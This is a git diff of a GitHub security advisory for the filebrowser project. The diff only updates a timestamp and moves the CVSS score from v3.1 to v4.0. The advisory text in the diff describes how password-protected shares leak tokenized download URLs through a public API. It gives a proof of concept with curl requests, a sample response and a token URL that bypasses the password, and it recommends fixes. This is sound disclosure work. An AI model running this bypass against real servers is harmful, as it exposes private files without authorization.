diff --git a/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json b/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json index c45a3c47053f7..cc85d4e8f97a1 100644 --- a/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json +++ b/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-525j-95gf-766f", - "modified": "2026-03-18T18:31:13Z", + "modified": "2026-03-18T18:32:15Z", "published": "2026-03-09T19:48:12Z", "aliases": [ "CVE-2026-30933" @@ -10,8 +10,8 @@ "details": "### Summary\nThe remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2. \n\n\n### Details\nThe issue stems from two flaws:\n1. Tokenized download URLs are written into the persistent share model\n```\nbackend/http/share.go\nconvertToFrontendShareResponse(line 63)\ns.DownloadURL = getShareURL(r, s.Hash, true, s.Token)\n```\n2. The public endpoint:\n```\nGET /public/api/share/info\nreturns shareLink.CommonShare without clearing DownloadURL.\n```\n\nSince Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.\n\nThe previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL\n\n\n### PoC\n1. Create a password protected share as an authenticated user \n\n2. Copy the public share URL (the clipboard WITHOUT an arrow) \n `http://yourdomain/public/share/yoursharedhash` \n Example: \n `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw` \n\n3. Query the public share endpoint via curl request: \n`curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*' ` \nExample: \n`curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*' ` \n \n Response includes:\n ```\n {\n \"shareTheme\": \"default\",\n \"title\": \"Shared files - test.md\",\n \"description\": \"A share has been sent to you to view or download.\",\n \"disableSidebar\": false,\n \"downloadURL\": \"http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D\",\n \"shareURL\": \"http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw\",\n \"enforceDarkLightMode\": \"default\",\n \"viewMode\": \"normal\",\n \"shareType\": \"normal\",\n \"sidebarLinks\": [\n {\n \"name\": \"Share QR Code and Info\",\n \"category\": \"shareInfo\",\n \"target\": \"#\",\n \"icon\": \"qr_code\"\n },\n {\n \"name\": \"Download\",\n \"category\": \"download\",\n \"target\": \"#\",\n \"icon\": \"download\"\n },\n {\n \"name\": \"sourceLocation\",\n \"category\": \"custom\",\n \"target\": \"/srv/test.md\",\n \"icon\": \"\"\n }\n ],\n \"hasPassword\": true,\n \"disableLoginOption\": false,\n \"sourceURL\": \"/srv/test.md\"\n }\n ```\nNote the response \"hasPassword\": true and downloadURL includes token= parameter\n\n\n4. Take the downloadURL(seen in json data response) and replace \\u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering \nExample:\n`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`\n\nBrowser downloads file immediately without requiring password\n\n### Impact \nAn unauthenticated attacker can retrieve password protected shared files without the password.\nResults in authentication bypass, unauthorized file access and confidentiality compromise\n\n### Recommended Remediation\nSanitize DownloadURL in public share info responses via `commonShare.DownloadURL = \"\"` before returning the json response in shareInfoHandler method located in backend/share.go\n\nStructural fix, only generate tokenized URLs after successful password validation", "severity": [ { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" } ], "affected": [